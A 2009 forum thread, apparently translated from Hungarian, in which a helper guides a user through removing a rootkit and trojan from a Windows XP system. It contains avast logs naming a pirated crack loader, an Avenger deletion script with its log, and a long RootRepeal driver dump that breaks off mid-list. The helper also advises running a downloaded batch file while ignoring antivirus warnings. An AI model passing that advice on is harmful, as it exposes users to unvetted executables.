VIRUSES, ROOTKITS AND EVERYTHING THAT DRINKS MY BLOOD!
soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, which is why what you see looks like this,

You've got time... :D


Sat Jun 20, 2009 21:38
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294

Since the full scan covers several hundred gigabytes ... I'll report back tomorrow, if that's OK.


Sat Jun 20, 2009 21:36
soul of the forum

Run this program; if avast complains, ignore it.
http://www.troublefixers.com/wp-content/uploads/Miscellaneous/GHremoval.bat
Restart, then do a complete scan with Malwarebytes, delete whatever it finds, and describe the situation.


Sat Jun 20, 2009 21:01
gold member

svchost.exe now has a problem with the memory area 0x6f8917c2

I scanned c:\windows with avast; this time it found nothing


Sat Jun 20, 2009 20:35
gold member

Oh dear ... it can't find it

Logfile of The Avenger Version 2.0, (c) by Swandog46
http://swandog46.geekstogo.com

Platform: Windows XP

*******************

Script file opened successfully.
Script file read successfully.

Backups directory opened successfully at C:\Avenger

*******************

Beginning to process script file:

Rootkit scan active.
No rootkits found!


Error: file "C:\WINDOWS\System32\x" not found!
Deletion of file "C:\WINDOWS\System32\x" failed!
Status: 0xc0000034 (STATUS_OBJECT_NAME_NOT_FOUND)


--> the object does not exist


Error: file "C:\WINDOWS\system32\gen.exe" not found!
Deletion of file "C:\WINDOWS\system32\gen.exe" failed!
Status: 0xc0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
--> the object does not exist


Completed script processing.

*******************

Finished! Terminate.


Sat Jun 20, 2009 20:28
soul of the forum

Download the Avenger program, run it, paste the text into the window, then click Execute, Yes, Yes; after the restart, post its log here.
http://swandog46.geekstogo.com/avenger.exe
Code:
Files to delete:
C:\WINDOWS\System32\x
C:\WINDOWS\system32\gen.exe


Sat Jun 20, 2009 19:56
gold member

009.06.14. 11:37:27 PALI 1216 Sign of "Win32:Trojan-gen {Other}" has been found in "C:\WINDOWS\system32\gen.exe" file.
2009.06.14. 22:39:49 SYSTEM 1224 Sign of "Win32:Trojan-gen {Other}" has been found in "http://rs252gc2.rapidshare.com/files/82536018/5461425/MOVAVI_EnhanceMovie_2.2.part2.rar\MOVAVI EnhanceMovie 2.2\Crack\Loader.exe" file.
2009.06.20. 12:12:47 SYSTEM 1324 Sign of "Win32:Rootkit-gen [Rtk]" has been found in "C:\WINDOWS\System32\x" file.
2009.06.20. 15:26:42 SYSTEM 1288 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
2009.06.20. 19:39:49 SYSTEM 1276 Sign of "Win32:Confi [Wrm]" has been found in "C:\WINDOWS\System32\x\[UPX]" file.
2009.06.20. 20:22:40 SYSTEM 1228 Sign of "Win32:Rootkit-gen [Rtk]" has been found in "C:\WINDOWS\System32\x" file.
2009.06.20. 20:24:14 SYSTEM 1228 Sign of "Win32:Confi [Wrm]" has been found in "C:\WINDOWS\System32\x" file.
2009.06.20. 20:35:23 SYSTEM 1228 Sign of "Win32:Confi [Wrm]" has been found in "C:\WINDOWS\System32\x" file.


Sat Jun 20, 2009 19:44
gold member

avast found a rootkit and also a trojan in the same place (several times already, so it can't handle it): c:\windows\system32\x





ROOTREPEAL (c) AD, 2007-2009
==================================================
Scan Time: 2009/06/20 20:21
Program Version: Version 1.3.0.0
Windows Version: Windows XP SP2
==================================================

Drivers
-------------------
Name:
Image Path:
Address: 0xF737F000 Size: 98304 File Visible: No Signed: -
Status: -

Name:
Image Path:
Address: 0x00000000 Size: 0 File Visible: No Signed: -
Status: -

Name: 1394BUS.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\1394BUS.SYS
Address: 0xF767C000 Size: 53248 File Visible: - Signed: -
Status: -

Name: a1d23twk.SYS
Image Path: C:\WINDOWS\System32\Drivers\a1d23twk.SYS
Address: 0xF69C9000 Size: 417792 File Visible: No Signed: -
Status: -

Name: a347bus.sys
Image Path: a347bus.sys
Address: 0xF741B000 Size: 160640 File Visible: - Signed: -
Status: -

Name: a347scsi.sys
Image Path: a347scsi.sys
Address: 0xF7B64000 Size: 5248 File Visible: - Signed: -
Status: -

Name: Aavmker4.SYS
Image Path: C:\WINDOWS\System32\Drivers\Aavmker4.SYS
Address: 0xF7954000 Size: 19072 File Visible: - Signed: -
Status: -

Name: ACPI.sys
Image Path: ACPI.sys
Address: 0xF73ED000 Size: 188032 File Visible: - Signed: -
Status: -

Name: ACPI_HAL
Image Path: \Driver\ACPI_HAL
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -

Name: afd.sys
Image Path: C:\WINDOWS\System32\drivers\afd.sys
Address: 0xF2F79000 Size: 138496 File Visible: - Signed: -
Status: -

Name: AFS2K.SYS
Image Path: C:\WINDOWS\System32\Drivers\AFS2K.SYS
Address: 0xF776C000 Size: 54336 File Visible: - Signed: -
Status: -

Name: aljprsl2.SYS
Image Path: C:\WINDOWS\System32\Drivers\aljprsl2.SYS
Address: 0xF6F95000 Size: 425984 File Visible: - Signed: -
Status: -

Name: AmdK8.sys
Image Path: C:\WINDOWS\system32\DRIVERS\AmdK8.sys
Address: 0xF773C000 Size: 65536 File Visible: - Signed: -
Status: -

Name: AmdLLD.sys
Image Path: C:\WINDOWS\system32\DRIVERS\AmdLLD.sys
Address: 0xF6B0B000 Size: 61440 File Visible: - Signed: -
Status: -

Name: arp1394.sys
Image Path: C:\WINDOWS\system32\DRIVERS\arp1394.sys
Address: 0xF784C000 Size: 60800 File Visible: - Signed: -
Status: -

Name: ASACPI.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ASACPI.sys
Address: 0xF7B70000 Size: 5152 File Visible: - Signed: -
Status: -

Name: ASAPIW2K.sys
Image Path: C:\WINDOWS\System32\Drivers\ASAPIW2K.sys
Address: 0xF79A4000 Size: 32768 File Visible: - Signed: -
Status: -

Name: AsIO.sys
Image Path: C:\WINDOWS\system32\drivers\AsIO.sys
Address: 0xF7BB6000 Size: 5184 File Visible: - Signed: -
Status: -

Name: aspi32.sys
Image Path: C:\WINDOWS\System32\drivers\aspi32.sys
Address: 0xF0309000 Size: 15968 File Visible: - Signed: -
Status: -

Name: asusgsb.sys
Image Path: C:\WINDOWS\system32\drivers\asusgsb.sys
Address: 0xF7031000 Size: 12416 File Visible: - Signed: -
Status: -

Name: aswFsBlk.sys
Image Path: C:\WINDOWS\system32\DRIVERS\aswFsBlk.sys
Address: 0xF2EBC000 Size: 32768 File Visible: - Signed: -
Status: -

Name: aswMon2.SYS
Image Path: C:\WINDOWS\System32\Drivers\aswMon2.SYS
Address: 0xF0903000 Size: 87296 File Visible: - Signed: -
Status: -

Name: aswRdr.SYS
Image Path: C:\WINDOWS\System32\Drivers\aswRdr.SYS
Address: 0xEFA7A000 Size: 15136 File Visible: - Signed: -
Status: -

Name: aswSP.SYS
Image Path: C:\WINDOWS\System32\Drivers\aswSP.SYS
Address: 0xF2E23000 Size: 135168 File Visible: - Signed: -
Status: -

Name: aswTdi.SYS
Image Path: C:\WINDOWS\System32\Drivers\aswTdi.SYS
Address: 0xF780C000 Size: 41664 File Visible: - Signed: -
Status: -

Name: ati2cqag.dll
Image Path: C:\WINDOWS\System32\ati2cqag.dll
Address: 0xBF0A5000 Size: 630784 File Visible: - Signed: -
Status: -

Name: ati2dvag.dll
Image Path: C:\WINDOWS\System32\ati2dvag.dll
Address: 0xBF051000 Size: 344064 File Visible: - Signed: -
Status: -

Name: ati2mtag.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ati2mtag.sys
Address: 0xF6BD6000 Size: 3928064 File Visible: - Signed: -
Status: -

Name: AtiHdmi.sys
Image Path: C:\WINDOWS\system32\drivers\AtiHdmi.sys
Address: 0xF3710000 Size: 110592 File Visible: - Signed: -
Status: -

Name: atikvmag.dll
Image Path: C:\WINDOWS\System32\atikvmag.dll
Address: 0xBF13F000 Size: 540672 File Visible: - Signed: -
Status: -

Name: atkdisp.dll
Image Path: C:\WINDOWS\System32\atkdisp.dll
Address: 0xBF012000 Size: 245760 File Visible: - Signed: -
Status: -

Name: atkkbnt.sys
Image Path: C:\WINDOWS\system32\drivers\atkkbnt.sys
Address: 0xF7055000 Size: 11136 File Visible: - Signed: -
Status: -

Name: ATMFD.DLL
Image Path: C:\WINDOWS\System32\ATMFD.DLL
Address: 0xBFFA0000 Size: 286720 File Visible: - Signed: -
Status: -

Name: audstub.sys
Image Path: C:\WINDOWS\system32\DRIVERS\audstub.sys
Address: 0xF7D3D000 Size: 3072 File Visible: - Signed: -
Status: -

Name: Beep.SYS
Image Path: C:\WINDOWS\System32\Drivers\Beep.SYS
Address: 0xF7B9E000 Size: 4224 File Visible: - Signed: -
Status: -

Name: BOOTVID.dll
Image Path: C:\WINDOWS\system32\BOOTVID.dll
Address: 0xF7A6C000 Size: 12288 File Visible: - Signed: -
Status: -

Name: Cdfs.SYS
Image Path: C:\WINDOWS\System32\Drivers\Cdfs.SYS
Address: 0xF6886000 Size: 63744 File Visible: - Signed: -
Status: -

Name: cdrom.sys
Image Path: C:\WINDOWS\system32\DRIVERS\cdrom.sys
Address: 0xF777C000 Size: 49536 File Visible: - Signed: -
Status: -

Name: cfosspeed.sys
Image Path: C:\WINDOWS\system32\DRIVERS\cfosspeed.sys
Address: 0xF6918000 Size: 724992 File Visible: - Signed: -
Status: -

Name: CLASSPNP.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\CLASSPNP.SYS
Address: 0xF76BC000 Size: 53248 File Visible: - Signed: -
Status: -

Name: cmdmon.sys
Image Path: C:\WINDOWS\System32\DRIVERS\cmdmon.sys
Address: 0xF30BF000 Size: 75520 File Visible: - Signed: -
Status: -

Name: disk.sys
Image Path: disk.sys
Address: 0xF76AC000 Size: 36352 File Visible: - Signed: -
Status: -

Name: dmio.sys
Image Path: dmio.sys
Address: 0xF7397000 Size: 153984 File Visible: - Signed: -
Status: -

Name: dmload.sys
Image Path: dmload.sys
Address: 0xF7B62000 Size: 5888 File Visible: - Signed: -
Status: -

Name: drmk.sys
Image Path: C:\WINDOWS\system32\drivers\drmk.sys
Address: 0xF783C000 Size: 61440 File Visible: - Signed: -
Status: -

Name: dump_atapi.sys
Image Path: C:\WINDOWS\System32\Drivers\dump_atapi.sys
Address: 0xF2E0B000 Size: 98304 File Visible: No Signed: -
Status: -

Name: dump_WMILIB.SYS
Image Path: C:\WINDOWS\System32\Drivers\dump_WMILIB.SYS
Address: 0xF7BC0000 Size: 8192 File Visible: No Signed: -
Status: -

Name: Dxapi.sys
Image Path: C:\WINDOWS\System32\drivers\Dxapi.sys
Address: 0xF2FCB000 Size: 12288 File Visible: - Signed: -
Status: -

Name: dxg.sys
Image Path: C:\WINDOWS\System32\drivers\dxg.sys
Address: 0xBF000000 Size: 73728 File Visible: - Signed: -
Status: -

Name: dxgthk.sys
Image Path: C:\WINDOWS\System32\drivers\dxgthk.sys
Address: 0xF7D61000 Size: 4096 File Visible: - Signed: -
Status: -

Name: ElbyCDFL.sys
Image Path: C:\WINDOWS\System32\Drivers\ElbyCDFL.sys
Address: 0xF799C000 Size: 27392 File Visible: - Signed: -
Status: -

Name: ElbyCDIO.sys
Image Path: C:\WINDOWS\System32\Drivers\ElbyCDIO.sys
Address: 0xF7A64000 Size: 18048 File Visible: - Signed: -
Status: -

Name: fetnd5bv.sys
Image Path: C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys
Address: 0xF77EC000 Size: 42496 File Visible: - Signed: -
Status: -

Name: Fips.SYS
Image Path: C:\WINDOWS\System32\Drivers\Fips.SYS
Address: 0xF6836000 Size: 35072 File Visible: - Signed: -
Status: -

Name: fltMgr.sys
Image Path: fltMgr.sys
Address: 0xF7360000 Size: 124800 File Visible: - Signed: -
Status: -

Name: Fs_Rec.SYS
Image Path: C:\WINDOWS\System32\Drivers\Fs_Rec.SYS
Address: 0xF7B98000 Size: 7936 File Visible: - Signed: -
Status: -

Name: fsbts.sys
Image Path: fsbts.sys
Address: 0xF76EC000 Size: 49152 File Visible: - Signed: -
Status: -

Name: ftdisk.sys
Image Path: ftdisk.sys
Address: 0xF73BD000 Size: 125312 File Visible: - Signed: -
Status: -

Name: gagp30kx.sys
Image Path: gagp30kx.sys
Address: 0xF76DC000 Size: 46464 File Visible: - Signed: -
Status: -

Name: gearaspiwdm.sys
Image Path: C:\WINDOWS\system32\drivers\gearaspiwdm.sys
Address: 0xF79DC000 Size: 28672 File Visible: - Signed: -
Status: -

Name: hal.dll
Image Path: C:\WINDOWS\system32\hal.dll
Address: 0x806E2000 Size: 134400 File Visible: - Signed: -
Status: -

Name: HDAudBus.sys
Image Path: C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
Address: 0xF6B9D000 Size: 151552 File Visible: - Signed: -
Status: -

Name: HIDCLASS.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\HIDCLASS.SYS
Address: 0xF6866000 Size: 36864 File Visible: - Signed: -
Status: -

Name: HIDPARSE.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\HIDPARSE.SYS
Address: 0xF7A44000 Size: 28672 File Visible: - Signed: -
Status: -

Name: hidusb.sys
Image Path: C:\WINDOWS\system32\DRIVERS\hidusb.sys
Address: 0xF3165000 Size: 9600 File Visible: - Signed: -
Status: -

Name: HTTP.sys
Image Path: C:\WINDOWS\System32\Drivers\HTTP.sys
Address: 0xEF783000 Size: 263040 File Visible: - Signed: -
Status: -

Name: i8042prt.sys
Image Path: C:\WINDOWS\system32\DRIVERS\i8042prt.sys
Address: 0xF77BC000 Size: 53120 File Visible: - Signed: -
Status: -

Name: imapi.sys
Image Path: C:\WINDOWS\system32\DRIVERS\imapi.sys
Address: 0xF774C000 Size: 41856 File Visible: - Signed: -
Status: -

Name: inspect.sys
Image Path: inspect.sys
Address: 0xF76CC000 Size: 51328 File Visible: - Signed: -
Status: -

Name: ipnat.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ipnat.sys
Address: 0xF309E000 Size: 134912 File Visible: - Signed: -
Status: -

Name: ipsec.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ipsec.sys
Address: 0xF312A000 Size: 74752 File Visible: - Signed: -
Status: -

Name: isapnp.sys
Image Path: isapnp.sys
Address: 0xF765C000 Size: 36096 File Visible: - Signed: -
Status: -

Name: kbdclass.sys
Image Path: C:\WINDOWS\system32\DRIVERS\kbdclass.sys
Address: 0xF7A04000 Size: 24960 File Visible: - Signed: -
Status: -

Name: KDCOM.DLL
Image Path: C:\WINDOWS\system32\KDCOM.DLL
Address: 0xF7B5C000 Size: 8192 File Visible: - Signed: -
Status: -

Name: kmixer.sys
Image Path: C:\WINDOWS\system32\drivers\kmixer.sys
Address: 0xEF6E1000 Size: 171776 File Visible: - Signed: -
Status: -

Name: ks.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ks.sys
Address: 0xF6B7A000 Size: 143360 File Visible: - Signed: -
Status: -

Name: KSecDD.sys
Image Path: KSecDD.sys
Address: 0xF7314000 Size: 92032 File Visible: - Signed: -
Status: -

Name: MarvinBus.sys
Image Path: C:\WINDOWS\system32\DRIVERS\MarvinBus.sys
Address: 0xF6773000 Size: 188416 File Visible: - Signed: -
Status: -

Name: mnmdd.SYS
Image Path: C:\WINDOWS\System32\Drivers\mnmdd.SYS
Address: 0xF7BA4000 Size: 4224 File Visible: - Signed: -
Status: -

Name: mouclass.sys
Image Path: C:\WINDOWS\system32\DRIVERS\mouclass.sys
Address: 0xF7A1C000 Size: 23424 File Visible: - Signed: -
Status: -

Name: MountMgr.sys
Image Path: MountMgr.sys
Address: 0xF768C000 Size: 42240 File Visible: - Signed: -
Status: -

Name: mrxdav.sys
Image Path: C:\WINDOWS\system32\DRIVERS\mrxdav.sys
Address: 0xF0204000 Size: 181248 File Visible: - Signed: -
Status: -

Name: mrxsmb.sys
Image Path: C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
Address: 0xF2E44000 Size: 455808 File Visible: - Signed: -
Status: -

Name: Msfs.SYS
Image Path: C:\WINDOWS\System32\Drivers\Msfs.SYS
Address: 0xF7944000 Size: 19072 File Visible: - Signed: -
Status: -

Name: msgpc.sys
Image Path: C:\WINDOWS\system32\DRIVERS\msgpc.sys
Address: 0xF78AC000 Size: 35072 File Visible: - Signed: -
Status: -

Name: MSPQM.sys
Image Path: C:\WINDOWS\system32\drivers\MSPQM.sys
Address: 0xF7BDA000 Size: 4992 File Visible: - Signed: -
Status: -

Name: mssmbios.sys
Image Path: C:\WINDOWS\system32\DRIVERS\mssmbios.sys
Address: 0xF701D000 Size: 15488 File Visible: - Signed: -
Status: -

Name: Mup.sys
Image Path: Mup.sys
Address: 0xF715D000 Size: 107904 File Visible: - Signed: -
Status: -

Name: NDIS.SYS
Image Path: C:\WINDOWS\System32\DRIVERS\NDIS.SYS
Address: 0xF725A000 Size: 182912 File Visible: - Signed: -
Status: -

Name: ndistapi.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ndistapi.sys
Address: 0xF6B6A000 Size: 9600 File Visible: - Signed: -
Status: -

Name: ndisuio.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ndisuio.sys
Address: 0xF09C9000 Size: 12928 File Visible: - Signed: -
Status: -

Name: ndiswan.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ndiswan.sys
Address: 0xF68B7000 Size: 91776 File Visible: - Signed: -
Status: -

Name: NDProxy.SYS
Image Path: C:\WINDOWS\System32\Drivers\NDProxy.SYS
Address: 0xF6AEB000 Size: 38016 File Visible: - Signed: -
Status: -

Name: netbios.sys
Image Path: C:\WINDOWS\system32\DRIVERS\netbios.sys
Address: 0xF789C000 Size: 34560 File Visible: - Signed: -
Status: -

Name: netbt.sys
Image Path: C:\WINDOWS\system32\DRIVERS\netbt.sys
Address: 0xF2F9B000 Size: 162816 File Visible: - Signed: -
Status: -

Name: nic1394.sys
Image Path: C:\WINDOWS\system32\DRIVERS\nic1394.sys
Address: 0xF77FC000 Size: 61824 File Visible: - Signed: -
Status: -

Name: nltdi.sys
Image Path: C:\WINDOWS\system32\drivers\nltdi.sys
Address: 0xF2FEB000 Size: 77312 File Visible: - Signed: -
Status: -

Name: Npfs.SYS
Image Path: C:\WINDOWS\System32\Drivers\Npfs.SYS
Address: 0xF795C000 Size: 30848 File Visible: - Signed: -
Status: -

Name: Ntfs.sys
Image Path: Ntfs.sys
Address: 0xF7287000 Size: 574592 File Visible: - Signed: -
Status: -

Name: ntkrnlpa.exe
Image Path: C:\WINDOWS\system32\ntkrnlpa.exe
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -

Name: Null.SYS
Image Path: C:\WINDOWS\System32\Drivers\Null.SYS
Address: 0xF7C86000 Size: 2944 File Visible: - Signed: -
Status: -

Name: ohci1394.sys
Image Path: ohci1394.sys
Address: 0xF766C000 Size: 61056 File Visible: - Signed: -
Status: -

Name: parport.sys
Image Path: C:\WINDOWS\system32\DRIVERS\parport.sys
Address: 0xF6B1B000 Size: 80128 File Visible: - Signed: -
Status: -

Name: PartMgr.sys
Image Path: PartMgr.sys
Address: 0xF78E4000 Size: 18688 File Visible: - Signed: -
Status: -

Name: ParVdm.SYS
Image Path: C:\WINDOWS\System32\Drivers\ParVdm.SYS
Address: 0xF7BB2000 Size: 6912 File Visible: - Signed: -
Status: -

Name: pci.sys
Image Path: pci.sys
Address: 0xF73DC000 Size: 67968 File Visible: - Signed: -
Status: -

Name: PCI_PNP1532
Image Path: \Driver\PCI_PNP1532
Address: 0x00000000 Size: 0 File Visible: No Signed: -
Status: -

Name: pciide.sys
Image Path: pciide.sys
Address: 0xF7C24000 Size: 3328 File Visible: - Signed: -
Status: -

Name: PCIIDEX.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\PCIIDEX.SYS
Address: 0xF78DC000 Size: 28672 File Visible: - Signed: -
Status: -

Name: pclepci.sys
Image Path: C:\WINDOWS\system32\drivers\pclepci.sys
Address: 0xF3171000 Size: 14112 File Visible: - Signed: -
Status: -

Name: pcouffin.sys
Image Path: C:\WINDOWS\System32\Drivers\pcouffin.sys
Address: 0xF78CC000 Size: 47360 File Visible: - Signed: -
Status: -

Name: PCTCore.sys
Image Path: PCTCore.sys
Address: 0xF732B000 Size: 143360 File Visible: - Signed: -
Status: -

Name: PnpManager
Image Path: \Driver\PnpManager
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -

Name: portcls.sys
Image Path: C:\WINDOWS\system32\drivers\portcls.sys
Address: 0xF68F6000 Size: 139264 File Visible: - Signed: -
Status: -

Name: PQNTDrv.SYS
Image Path: C:\WINDOWS\System32\Drivers\PQNTDrv.SYS
Address: 0xF7CC5000 Size: 2688 File Visible: - Signed: -
Status: -

Name: psched.sys
Image Path: C:\WINDOWS\system32\DRIVERS\psched.sys
Address: 0xF68A6000 Size: 69120 File Visible: - Signed: -
Status: -

Name: ptilink.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ptilink.sys
Address: 0xF7994000 Size: 17792 File Visible: - Signed: -
Status: -

Name: rasacd.sys
Image Path: C:\WINDOWS\system32\DRIVERS\rasacd.sys
Address: 0xF323E000 Size: 8832 File Visible: - Signed: -
Status: -

Name: rasl2tp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
Address: 0xF785C000 Size: 51328 File Visible: - Signed: -
Status: -

Name: raspppoe.sys
Image Path: C:\WINDOWS\system32\DRIVERS\raspppoe.sys
Address: 0xF787C000 Size: 41472 File Visible: - Signed: -
Status: -

Name: raspptp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\raspptp.sys
Address: 0xF788C000 Size: 48384 File Visible: - Signed: -
Status: -

Name: raspti.sys
Image Path: C:\WINDOWS\system32\DRIVERS\raspti.sys
Address: 0xF79C4000 Size: 16512 File Visible: - Signed: -
Status: -

Name: RAW
Image Path: \FileSystem\RAW
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -

Name: rdbss.sys
Image Path: C:\WINDOWS\system32\DRIVERS\rdbss.sys
Address: 0xF2F2C000 Size: 176512 File Visible: - Signed: -
Status: -

Name: RDPCDD.sys
Image Path: C:\WINDOWS\System32\DRIVERS\RDPCDD.sys
Address: 0xF7BAA000 Size: 4224 File Visible: - Signed: -
Status: -

Name: rdpdr.sys
Image Path: C:\WINDOWS\system32\DRIVERS\rdpdr.sys
Address: 0xF67D5000 Size: 196864 File Visible: - Signed: -
Status: -

Name: redbook.sys
Image Path: C:\WINDOWS\system32\DRIVERS\redbook.sys
Address: 0xF779C000 Size: 57728 File Visible: - Signed: -
Status: -

Name: rootrepeal.sys
Image Path: C:\WINDOWS\system32\drivers\rootrepeal.sys
Address: 0xEFAF8000 Size: 49152 File Visible: No Signed: -
Status: -

Name: RtkHDAud.sys
Image Path: C:\WINDOWS\system32\drivers\RtkHDAud.sys
Address: 0xF32A6000 Size: 4628480 File Visible: - Signed: -
Status: -

Name: SASDIFSV.SYS
Image Path: C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
Address: 0xF7A3C000 Size: 28672 File Visible: - Signed: -
Status: -

Name: SASKUTIL.sys
Image Path: C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys
Address: 0xF2F58000 Size: 135168 File Visible: - Signed: -
Status: -

Name: SCSIPORT.SYS
Image Path: C:\WINDOWS\System32\Drivers\SCSIPORT.SYS
Address: 0xF7443000 Size: 98304 File Visible: - Signed: -
Status: -

Name: serenum.sys
Image Path: C:\WINDOWS\system32\DRIVERS\serenum.sys
Address: 0xF7011000 Size: 15488 File Visible: - Signed: -
Status: -

Name: serial.sys
Image Path: C:\WINDOWS\system32\DRIVERS\serial.sys
Address: 0xF77DC000 Size: 65536 File Visible: - Signed: -
Status: -

Name: snapman.sys
Image Path: snapman.sys
Address: 0xF7178000 Size: 122560 File Visible: - Signed: -
Status: -

Name: spbp.sys
Image Path: spbp.sys
Address: 0xF745B000 Size: 1048576 File Visible: No Signed: -
Status: -

Name: sptd
Image Path: \Driver\sptd
Address: 0x00000000 Size: 0 File Visible: No Signed: -
Status: -

Name: sr.sys
Image Path: sr.sys
Address: 0xF734E000 Size: 73472 File Visible: - Signed: -
Status: -

Name: srv.sys
Image Path: C:\WINDOWS\system32\DRIVERS\srv.sys
Address: 0xEFEF0000 Size: 336256 File Visible: - Signed: -
Status: -

Name: STREAM.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\STREAM.SYS
Address: 0xF781C000 Size: 49152 File Visible: - Signed: -
Status: -

Name: swenum.sys
Image Path: C:\WINDOWS\system32\DRIVERS\swenum.sys
Address: 0xF7B80000 Size: 4352 File Visible: - Signed: -
Status: -

Name: sysaudio.sys
Image Path: C:\WINDOWS\system32\drivers\sysaudio.sys
Address: 0xF6806000 Size: 60800 File Visible: - Signed: -
Status: -

Name: tbhsd.sys
Image Path: C:\WINDOWS\system32\drivers\tbhsd.sys
Address: 0xF782C000 Size: 36864 File Visible: - Signed: -
Status: -

Name: tcpip.sys
Image Path: C:\WINDOWS\system32\DRIVERS\tcpip.sys
Address: 0xF30D2000 Size: 359040 File Visible: - Signed: -
Status: -

Name: TDI.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\TDI.SYS
Address: 0xF797C000 Size: 20480 File Visible: - Signed: -
Status: -

Name: tdrpman.sys
Image Path: tdrpman.sys
Address: 0xF7196000 Size: 362048 File Visible: - Signed: -
Status: -

Name: termdd.sys
Image Path: C:\WINDOWS\system32\DRIVERS\termdd.sys
Address: 0xF775C000 Size: 40704 File Visible: - Signed: -
Status: -

Name: thdudf.sys
Image Path: C:\WINDOWS\system32\DRIVERS\thdudf.sys
Address: 0xF0AA9000 Size: 66944 File Visible: - Signed: -
Status: -

Name: tifsfilt.sys
Image Path: C:\WINDOWS\system32\DRIVERS\tifsfilt.sys
Address: 0xF78BC000 Size: 37696 File Visible: - Signed: -
Status: -

Name: timntr.sys
Image Path: timntr.sys
Address: 0xF71EF000 Size: 435072 File Visible: - Signed: -
Status: -

Name: tvcap.sys
Image Path: C:\WINDOWS\system32\DRIVERS\tvcap.sys
Address: 0xF6A2F000 Size: 308736 File Visible: - Signed: -
Status: -

Name: tvtuner.sys
Image Path: C:\WINDOWS\system32\DRIVERS\tvtuner.sys
Address: 0xF7A2C000 Size: 16512 File Visible: - Signed: -
Status: -

Name: Udfs.SYS
Image Path: C:\WINDOWS\System32\Drivers\Udfs.SYS
Address: 0xF31FD000 Size: 66176 File Visible: - Signed: -
Status: -

Name: ULCDRHlp.sys
Image Path: C:\WINDOWS\System32\Drivers\ULCDRHlp.sys
Address: 0xF79B4000 Size: 27392 File Visible: - Signed: -
Status: -

Name: update.sys
Image Path: C:\WINDOWS\system32\DRIVERS\update.sys
Address: 0xF67A1000 Size: 209408 File Visible: - Signed: -
Status: -

Name: usbccgp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbccgp.sys
Address: 0xF7974000 Size: 31616 File Visible: - Signed: -
Status: -

Name: USBD.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\USBD.SYS
Address: 0xF7B92000 Size: 8192 File Visible: - Signed: -
Status: -

Name: usbehci.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbehci.sys
Address: 0xF79EC000 Size: 26624 File Visible: - Signed: -
Status: -

Name: usbhub.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbhub.sys
Address: 0xF6AAB000 Size: 57600 File Visible: - Signed: -
Status: -

Name: USBPORT.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\USBPORT.SYS
Address: 0xF6B2F000 Size: 143360 File Visible: - Signed: -
Status: -

Name: usbprint.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbprint.sys
Address: 0xF798C000 Size: 25856 File Visible: - Signed: -
Status: -

Name: usbscan.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbscan.sys
Address: 0xF2FE7000 Size: 15104 File Visible: - Signed: -
Status: -

Name: usbuhci.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbuhci.sys
Address: 0xF79E4000 Size: 20480 File Visible: - Signed: -
Status: -

Name: USIUDF.sys
Image Path: C:\WINDOWS\System32\Drivers\USIUDF.sys
Address: 0xF31B5000 Size: 292896 File Visible: - Signed: -
Status: -

Name: vbev5mp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\vbev5mp.sys
Address: 0xF77AC000 Size: 56064 File Visible: - Signed: -
Status: -

Name: vga.sys
Image Path: C:\WINDOWS\System32\drivers\vga.sys
Address: 0xF7904000 Size: 20992 File Visible: - Signed: -
Status: -

Name: viaide.sys
Image Path: viaide.sys
Address: 0xF7B60000 Size: 5376 File Visible: - Signed: -
Status: -

Name: Video3D32.sys
Image Path: C:\WINDOWS\System32\Drivers\Video3D32.sys
Address: 0xF704D000 Size: 10752 File Visible: - Signed: -
Status: -

Name: VIDEOPRT.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\VIDEOPRT.SYS
Address: 0xF6BC2000 Size: 81920 File Visible: - Signed: -
Status: -

Name: videX32.sys
Image Path: videX32.sys
Address: 0xF78EC000 Size: 32768 File Visible: - Signed: -
Status: -

Name: VolSnap.sys
Image Path: VolSnap.sys
Address: 0xF769C000 Size: 52736 File Visible: - Signed: -
Status: -

Name: wanarp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\wanarp.sys
Address: 0xF6A8B000 Size: 34560 File Visible: - Signed: -
Status: -

Name: watchdog.sys
Image Path: C:\WINDOWS\System32\watchdog.sys
Address: 0xF79D4000 Size: 20480 File Visible: - Signed: -
Status: -

Name: wdmaud.sys
Image Path: C:\WINDOWS\system32\drivers\wdmaud.sys
Address: 0xF06BE000 Size: 82944 File Visible: - Signed: -
Status: -

Name: Win32k
Image Path: \Driver\Win32k
Address: 0xBF800000 Size: 1839104 File Visible: - Signed: -
